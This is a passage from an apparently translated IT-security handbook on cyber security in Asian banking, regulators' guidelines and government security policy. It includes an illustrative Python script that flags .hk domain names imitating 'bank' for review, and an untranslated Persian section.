On court-admissible evidence, it was noted that electronic data is liable to rapid destruction, and that in the field of computer crime there is no standard for legal evidence. Although the world needs guidelines for digital forensic investigation, there is at present no standard method accepted by the courts.
The Chinese representative said that public awareness of the place of electronic security must be raised, and that more external assessments are needed to achieve this. One of the main problems China faces in electronic security is a lack of management awareness and ability to assess risk (especially given the complex nature of the technologies). In China this problem is made worse by weak cooperation between regulatory and supervisory bodies.
digital certificate either, and it also claimed to have offices in New York and elsewhere; but investigations showed that both the website (which was hosted in China) and the purported bank were fake. The incident once again revealed the vital need for cross-sector cooperation, particularly because cybercriminals themselves operate across sectors.
Hong Kong is laying the groundwork for monitoring and educating customers, for example by publishing guides to raise public awareness of the critical aspects of electronic security and by issuing alerts to counter computer crime. To strengthen supervision of electronic security, it works closely with domain registrars [240] and uses an automated process to screen local (.hk) domain names: if the word "bank" or any other form of it appears in a domain name, the matter is immediately referred to the competent authorities for review. The police, the computer security emergency response center, and the Hong Kong government also cooperate with various bodies at the international level to build a rapid incident response capability. A supervisory control self-assessment (CSA) [241] system exists in some 70 to 80 banks, and because of the particular difficulties of annual assessment, this assessment is also carried out automatically.
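The automated screening of .hk domain names described above can be illustrated with the following example, which is added here and is not taken from the handbook or from any Hong Kong registry. The watch list, the look-alike table, the function names and the sample applications are all assumptions made for the illustration.

```python
"""Screen .hk domain applications for "bank" and disguised variants of it."""
import unicodedata

# Assumption: the text only says "bank" or any other form of it; this watch
# list (English, French/Spanish stems, Chinese) is illustrative.
KEYWORDS = ("bank", "banc", "banque", "\u9280\u884c", "\u94f6\u884c")  # 銀行, 银行

# Assumption: digit and Cyrillic look-alikes often used to disguise a word.
LOOKALIKES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u043a": "k", "\u0441": "c",
})


def decode_label(label):
    """Return one DNS label in Unicode, decoding punycode ("xn--") labels."""
    if label.lower().startswith("xn--"):
        try:
            return label.lower().encode("ascii").decode("idna")
        except UnicodeError:
            return label  # undecodable: screen the raw text instead
    return label


def normalise(label):
    """Fold case, accents, look-alike characters and hyphens out of a label."""
    text = unicodedata.normalize("NFKC", decode_label(label)).lower()
    text = "".join(ch for ch in unicodedata.normalize("NFKD", text)
                   if not unicodedata.combining(ch))
    return text.translate(LOOKALIKES).replace("-", "")


def screen_domain(domain):
    """Return the watch-list words found in a .hk name ([] means no referral)."""
    labels = domain.strip().rstrip(".").split(".")
    if len(labels) < 2 or labels[-1].lower() != "hk":
        return []  # not a local (.hk) name, outside this check
    hits = []
    for label in labels[:-1]:
        text = normalise(label)
        for word in KEYWORDS:
            if word in text and word not in hits:
                hits.append(word)
    return hits


def referral_queue(applications):
    """Return (domain, hits) pairs that need review by the authority."""
    queue = []
    for domain in applications:
        hits = screen_domain(domain)
        if hits:
            queue.append((domain, hits))
    return queue


# Constructed sample applications, not real registrations.
SAMPLE_APPLICATIONS = [
    "flowers.com.hk",
    "hongkong-bank.com.hk",
    "b4nk-online.hk",
    "b\u00e4nk-direct.hk",              # accented "a"
    "b\u0430nk-secure.hk",              # Cyrillic "a" in place of Latin "a"
    "\u5b89\u5168\u9280\u884c.hk",      # Chinese name containing 銀行
    "mybank.com",                       # not under .hk
]

if __name__ == "__main__":
    for name, words in referral_queue(SAMPLE_APPLICATIONS):
        print(f"REFER {name}: matched {words}")
```

A substring match of this kind deliberately over-reports (a name such as "riverbank" would also be queued), which fits a process whose output is a referral for human review rather than an automatic refusal.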
Republic of Korea
Although Korea was unable to take part in this global discussion, it answered the questions posed by the World Bank. They noted that although Korea has advanced information networks, their level of security still has room for improvement. In Korea, 65% of stock exchange trading is done over the Internet, and about 25 million people use the Internet. Recent incidents such as the damage caused by the Slammer worm in January 2003 had a severe impact in Korea and exposed the fragile nature of networks.
240 Domain Registrar
241 Supervisory Control Self-Assessment
Korea presented statistics that showed a low level of awareness of system security. According to the Ministry of Information and Communication, only 12.9% of e-commerce companies, 16.7% of educational institutions, and 9.2% of other organizations have a unit for information security. Korea noted that many companies see electronic security as an ill-defined cost that can only be met by committing sufficient resources and time. For example, only about 12.9% of e-commerce companies and 6.1% of all companies in the country use intrusion detection systems to protect themselves.
Sri Lanka
The Sri Lankan representative said that threats such as worms and wireless vulnerabilities exist in that country, but that the Sri Lankan authorities have so far received no reports of attacks on banking systems. The country has been using ATMs for about 20 years. Although electronic banking in Sri Lanka is in its infancy, it is spreading rapidly. Shares and money can be traded over the Internet, but these facilities too are still in the early stages of their development. At present, the most significant security incident in Sri Lanka is the theft of user IDs and passwords. For financial service institutions, the level of risk awareness is a key issue, and risks must also be assessed carefully.
Cyber security in Singapore's financial sector
Tony Chew [242], director of technology risk supervision at the Monetary Authority of Singapore (MAS) [243], gave a brief overview of the fundamentals of cyber security. He began by saying that the responsibility of his unit is to "inform institutions, supervise them, or be strict with them". Singapore is striving to become an international hub for financial services, which is why information technology security is of particular importance to it.
242 Tony Chew
243 Monetary Authority of Singapore
Singapore's largest banks were attacked by intruders in 2001 and 2002, which shows the country's urgent need for strategies to mitigate security risks. In 2001 Singapore's largest bank (UOB) discovered an intruder in its Internet banking system. Although most of the information about this incident remained confidential, it emerged that intruders from Eastern Europe had attacked the banking system. The bank's data was examined, and the banking system was manipulated in order to update customer accounts. Not only did it take specialists several months to find the root of the problem, but great effort and heavy expense went into discovering who or what had caused it.
A basic weakness that played a part in all of these incidents was the use of single-factor authentication. Even now, most ATMs use very rudimentary authentication methods, and only one or two dreadful incidents may be enough to make banks rethink this practice. There is also a kind of excessive trust and confidence in SSL technology; yet the security that SSL provides is very limited, because it protects information only while it is in transit, and not at the source or the destination. Databases and other storage media must always be kept encrypted so that their security
The Monetary Authority of Singapore drew up "Technology Risk Management Guidelines" for financial service institutions, comprising 26 recommendations on building layered security. The three main categories of these guidelines are:
1. Establishing a sound process for risk management
2. Strengthening availability, security, and recoverability
3. Using strong cryptography to protect data
In addition to setting policies on technology, the Monetary Authority of Singapore required banks to carry out penetration testing and an assessment of their operating environment at least once a year. The Authority has a technology risk assessment team and a system for rating banks in Singapore's economic system, based on six criteria set by the Authority. These criteria sort institutions into five categories by level of security, with 1 denoting the most secure and 5 the least secure. Banks are required to achieve at least a rating of 2 in this assessment, and in addition they must have a rapid recovery and restoration plan for their systems. To motivate banks to improve their security and to instill a sense of standardization, the results of this rating are published. Banks are also required to report any security incident.
With the growing use of mobile payment devices, the vulnerabilities of wireless technology must also be addressed. Security practices in Singapore's wireless banking are currently still under review.
‫ﺟﻤﻊﺑﻨﺪﻱ ﺳﺆﺍﻻﺕ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‬
‫ﺗﻮﺻﻴﻪﻫﺎ ﻭ ﭘﺮﺳﺸﻬﺎﻱ ﭘﺎﻳﺎﻧﻲ ﺷﺎﻣﻞ ﻧﻘﺎﻁ ﻛﻠﻴﺪﻱ ﺍﻳـﻦ ﺳـﻤﻴﻨﺎﺭ‬
‫ﺟﻬﺎﻧﻲ ﺑﻮﺩ‪.‬‬
‫ﻲ ﻧﻴﺎﺯﻫﺎﻱ ﺣـﺎﻝ‬
‫ﺍﻭﻝ‪ ،‬ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ ﻭ ﺁﮔﺎﻫﻲ ﺩﺭ ﺁﻣﻮﺯﺵ ﻋﻤﻮﻣ ﹺ‬
‫ﺣﺎﺿﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨـﺪ‪ .‬ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﻣﺜـﻞ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﺳﺎﻝ ‪ ،۲۰۰۲‬ﺣﻤﻠﺔ ﺩﻳﮕﺮﻱ ﺑﻪ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ‬
‫)‪ (DBS‬ﺻــﻮﺭﺕ ﮔﺮﻓــﺖ‪ .‬ﺩﺭ ﺍﻳــﻦ ﺭﻭﻳــﺪﺍﺩ ﻧﻔــﻮﺫﮔﺮﺍﻥ ﺑــﺪﻟﻴﻞ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻛﻲ ﺷـﺒﻜﻪ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻧﺎﻣﻨﺎﺳـﺐ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﺗﻮﺍﻧﺴﺘﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ‪۲۱‬‬
‫ﻣﺸﺘﺮﻱ ﺑﺎﻧﻚ ﺗﻌﺒﻴﻪ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﺗـﺎ ﺷـﻤﺎﺭﺓ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ )‪ (PIN‬ﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺎﻳﻲ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺪﺳـﺖ‬
‫ﺁﻭﺭﻧــﺪ‪ .‬ﺍﻳــﻦ ﺣﺎﺩﺛــﻪ ﺳــﺒﺐ ﺷــﺪ ‪ ۶۲,۰۰۰‬ﺩﻻﺭ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﺿﺮﺭ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻧﻜﺘﺔ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺗﺄﺛﻴﺮ ﻣﻨﻔﻲ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺩﺭ ﺍﻓﻜﺎﺭ ﻋﻤﻮﻣﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﺑﻮﺩ؛‬
‫ﭼﺮﺍﻛﻪ ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻛﺸﻮﺭ ﺑﻪ ﻣـﺪﺕ ﻳﻜﻤـﺎﻩ ﺩﺭ ﺍﻳـﻦ ﺧـﺼﻮﺹ‬
‫ﻣﻄﻠﺐ ﻧﻮﺷـﺘﻨﺪ‪ .‬ﺍﻣﺜـﺎﻝ ﺍﻳـﻦ ﺭﺧـﺪﺍﺩﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺑﺤـﺮﺍﻥ‬
‫ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﻣﺮﺩﻡ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣﻨﺠـﺮ‬
‫ﺷﻮﻧﺪ‪.‬‬
‫ﺗﻀﻤﻴﻦ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ‪PIN‬ﻫﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺷﻮﺩ؛ ﺍﻣﺎ ﺍﻳﻦ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ ،‬ﭼـﻮﻥ ‪PIN‬ﻫـﺎ ﻛﻮﭼـﻚ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪.‬‬
‫‪٢٢٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫"ﺍﻟﺰﺍﻡ ﮔﺰﺍﺭﺵ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﻜﻮﻙ" ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ‬
‫ﻛﻪ ﺑﻪ ﻣﺮﺣﻠﺔ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ‪.‬‬
‫ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻟﻲ ﺍﺯ ﻧﺤﻮﺓ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ‬
‫ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪.‬‬
‫ﺩﻭﻡ‪ ،‬ﺷﻔﺎﻓﻴﺖ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ‬
‫ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻳﻨﺪﻩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ‬
‫ﺍﺷﺎﺭﻩ ﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﭘﻮﺷﺶ ﺧﺒﺮﻱ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻀﺮ ﺑﺎﺷـﺪ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻫﺮﺻﻮﺭﺕ ﺍﺯ ﻣﻄﺒﻮﻋﺎﺕ ﺗـﺄﺛﻴﺮ ﻣـﻲﭘﺬﻳﺮﻧـﺪ‪.‬‬
‫ﺩﺭﻋــﻮﺽ ﺷــﺮﻛﺘﻬﺎ ﺑﺎﻳــﺪ ﻭﺿــﻌﻴﺖ ﺭﺍ ﺑــﺴﺮﻋﺖ ﺍﺻــﻼﺡ ﻛﻨﻨــﺪ‪.‬‬
‫ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺸﻜﻞ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﻚ ﻃـﺮﺡ ﻋﻤﻠﻴـﺎﺗﻲ‪ ،‬ﺭﺍﻩ ﺑﻬﺘـﺮﻱ‬
‫ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪ .‬ﺳﺆﺍﻝ ﻋﻤـﺪﻩﺍﻱ ﻛـﻪ ﺩﺭ‬
‫ﺍﻳﻨﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭼﻪ ﺣﺪﻱ ﻭ ﺩﺭ ﭼﻪ ﺯﻣـﺎﻧﻲ‬
‫ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ‪ .‬ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ‬
‫ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﭼﻬﺎﺭﻡ‪ ،‬ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻧﻮﻋﻲ ﺗﻌﻬﺪ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﻧﻘــﺸﻬﺎ ﻭ ﻣــﺴﺌﻮﻟﻴﺘﻬﺎ ﺑﺎﻳــﺪ ﺗﻌﻴــﻴﻦ ﺷــﻮﻧﺪ؛ ﻭ ﻟــﺬﺍ ﺗــﺪﻭﻳﻦ ﻳــﻚ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺮﺍﻗﺒﺖ ﻭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﺍﻣﺎﻧﺘﺪﺍﺭﻱ ﺑﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳـﺖ‪ .‬ﻋﻨـﺎﻭﻳﻦ‬
‫ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺳﭙﺮﺩﻩﻫـﺎ ﻭ ﺗﺮﺍﻛﻨـﺸﻬﺎ‪ ،‬ﺍﻋﺘﻤـﺎﺩ‬
‫ﻋﻤﻮﻣﻲ‪ ،‬ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‪.‬‬
‫ﺳﻮﻡ‪ ،‬ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎﻱ ﺷـﺮﻛﺖﻛﻨﻨـﺪﻩ ﺑـﻪ ﻟـﺰﻭﻡ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ‬
‫ﻓﺮﺍﺑﺨﺸﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺁﻥ‬
‫ﻣﺜﻤﺮ ﺛﻤﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫـﺴﺘﻨﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﻗﺴﻤﺖ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺟﺎﻣﻌﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨـﺪ‬
‫ﺗﺎ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﺮ ﺑﺨﺶ ﻣﺸﺨﺺ ﺷـﻮﺩ‪ ،EBG .‬ﻳﻜـﻲ ﺍﺯ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﻧﻴﺰ ‪ InfraGard‬ﻛﻪ ﻳﻚ‬
‫ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ‪ -‬ﻋﻤﻮﻣﻲ ﻣﺘﻌﻠﻖ ﺑـﻪ ‪ FBI‬ﺍﺳـﺖ ﺩﻭ ﻧﻤﻮﻧـﻪ ﺍﺯ‬
‫ﺍﻳﻦ ﻗﺒﻴﻞ ﻣﺆﺳﺴﺎﺕ ﻫﺴﺘﻨﺪ‪ InfraGard .‬ﺗﻤﺎﻣﻲ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ﻭ ﺣﺪﻭﺩ ‪ ۱۰,۰۰۰‬ﻋﻀﻮ ﺩﺍﺭﺩ‪ .‬ﻫﺪﻑ ﺍﻳﻦ‬
‫ﺳﺎﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺍﻋـﻀﺎ‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﻜﻲ ﺍﺯ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ‬
‫ﻣﻬﻢ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺑﻮﺩ‪ .‬ﻧﻤﻮﻧﻪﺍﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ‬
‫ﺯﻣﻴﻨﻪ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺭﺥ ﺩﺍﺩ؛ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺷـﺮﻛﺖ ﺧـﺪﻣﺎﺕ‬
‫ﻣﻴﺰﺑــﺎﻧﻲ ﻭﺏ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﻣــﻮﺭﺩ ﻧﻔــﻮﺫ ﻗــﺮﺍﺭ ﮔﺮﻓــﺖ ﻭ‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ‪ ۳۰۰‬ﺑﺎﻧـﻚ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪ‪ .‬ﺟﺰﺋﻴـﺎﺕ‬
‫ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ‬
‫ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﻭ ﺳـﺎﻳﺮ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﺩﺭ ﻗـﺴﻤﺖ‬
‫ﺿﻤﺎﺋﻢ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺧﺎﺗﻤــﻪ ﺧﺎﻃﺮﻧــﺸﺎﻥ ﻣــﻲﻛﻨــﻴﻢ ﻛــﻪ ﺑــﺮﺍﻱ ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﻭ‬
‫ﺑﺎﺯﺭﺳﺎﻥ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﭼﺘﺮ ﺗﻘﻨﻴﻨﻲ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﭘـﻮﻝ‬
‫ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ‪ ،‬ﻣﺜﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻧﻲ ﻭﺏ( ﺍﻣﺮﻱ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ‬
‫ﺍﺳﺖ‪.‬‬
Part Four: Information Technology Security and Government Policies

Chapter 1. Introduction
Chapter 2. Protecting Government Systems
Chapter 3. The Role of Law and Government Policies with Respect to the Private Sector
Chapter 4. Government Cyber-Security Policies
Chapter One
Introduction

As in other areas that affect the Internet, government policy plays an important role in information technology security. Nevertheless, one must comment on this with caution, because a general policy framework can strengthen security, but the problems created by ill-conceived government regulation outweigh the benefits of such regulation. Technology is changing rapidly and new cyber threats[1] spread so fast that government regulations can easily become obstacles to rapid, innovative responses. The best course is therefore to find a balance between regulatory and non-regulatory measures. To achieve such a balance, policymakers must pay attention to some of the inherent and unique characteristics of the Internet. Compared with earlier information and communication technologies, cyberspace[2] is a decentralized space. Part of the Internet's power stems from the fact that it has no gatekeepers and that most of its functionality lies at the edges of the network rather than at its centre. Government cyber-security policies must take these characteristics of the Internet into account. This chapter sets out a series of steps that governments can use, independently of technical decisions, to improve the security of their computers.[3]

Although this varies from country to country, in many countries part or all of the communication networks, and many of the important and sensitive infrastructures that are based on computer systems (banking, transport, energy, manufacturing and so on), are owned and operated by the private sector.[4] A large share of the responsibility for ensuring the security of these systems therefore rests with the private sector. Despite this, the existence and performance of such systems are essential to national welfare, and they are usually used where public uptake is greatest, so the government pays close attention to them. Governments usually have their own computer systems, including computers used for national security, emergency services, health and other essential functions, and these often depend on private communication networks. Overall, many of the computer systems of private companies and government organizations depend on the same software and hardware, designed and built by private companies, and so their security is a significant concern.

For all these reasons, responsibility for the security of these systems is shared between the government and the private sector. As a first priority, the government is responsible for "putting its own house in order"; that is, it must apply sound security practices to improve the security of its own systems. In addition, it is recognized worldwide that the government must use the force of civil and criminal law to punish and prevent attacks on private-sector systems as well as on government systems. Beyond that, many governments have concluded that they must take on additional responsibilities in order to improve computer security practices in the private sector. The aim is for the government to adopt policies that do not cause technology laws and programmes to stifle innovation, but instead maximize the benefits of government intervention in these matters. In a cooperative environment, a balance is found among the following:

• market pressure, which pushes private companies towards securing their computer systems in order to earn more profit;
• government research and awareness-raising;
• computer crime laws that protect the computers of government and private networks;
• traditional legal concepts that have entered the computing environment; and
• laws, regulations and government policies that focus specifically on improving computer security.

The concept of "computer security policy" can be seen as part of a broader subject called "the role of law in building trust on the Internet". Creating a trustworthy environment in cyberspace requires adapting the laws and government policies of other areas to the field of cyber security. These areas include consumer protection,[5] data and communications privacy,[6] intellectual property rights[7] and the e-commerce framework.[8] In the offline world, the law provides protections for commercial transactions and consumers. Most of these laws are also applicable in cyberspace, but countries that seek to expand information and communication technology (ICT) must examine whether there are gaps in their laws that prevent the trust needed to improve the security of cyberspace from being established. Indeed, countries interested in expanding e-commerce may find that their laws on financial services, cyber property and consumer protection do not provide the trust or support needed for interactions outside the Internet world. Reform of the laws of the cyber world may be carried out as part of reforms to more general laws. This book focuses on those laws and policies that directly address attacks on computer systems (some of which are mentioned in Part Three and in the appendices), and leaves questions within the broader framework of ICT and e-commerce to other sources.[9]

In addition to an introductory explanation concerning developing countries, this part also describes in detail programmes and policies that are consistent with the laws of many developed countries and multinational organizations. The points raised have been updated with acceptable accuracy. Nevertheless, the focus on the sources and models of developed countries and international centres should not deter other countries from studying the subject further. It is very important that all countries develop, progress and choose an appropriate framework for their own e-security.[10] The financial and human resources available differ, and developing countries must approach this subject at a basic level; but the principles stated here apply globally. It must always be remembered that cyberspace and cyber security are not confined to national borders.

[1] Cyber Threats
[2] Cyberspace
[3] For more information, see the following sites:
http://www.abanet.org/abapubs/books/cybercrime
http://www.isn.ethz.ch/crn
[4] In some countries privatization is an entirely new matter, which means that users, legislators and policymakers, while struggling with the full range of traditional problems associated with privatization, have only recently begun to grapple with the security problem as well.
[5] Consumer Protection
[6] Data & Communications Privacy
[7] Intellectual Property Rights
[8] E-Commerce Framework
[9] The Global Internet Policy Initiative has a section covering the full range of security issues that affect ICT development.
[10] E-Security
The Concept of Critical Infrastructures

In a number of countries, the government's response procedures for computer security problems have come under the name of critical infrastructures.[11] A critical infrastructure is a network of physical assets and systems that plays a significant role in a country's economy or welfare. For example, the financial services network is a critical infrastructure that includes all private banks, the central bank, commodity exchanges, cheque clearing organizations and other institutions involved in financial and credit services. In almost every country in the world these operations are carried out using computers. The transport network is another critical infrastructure, made up of roads, bridges, canals, railways and airports. The transport infrastructure is mostly physical and mechanical; but the correct operation of traffic lights, the opening and closing of bridges, the running of trains and air traffic control all depend on computers working correctly.

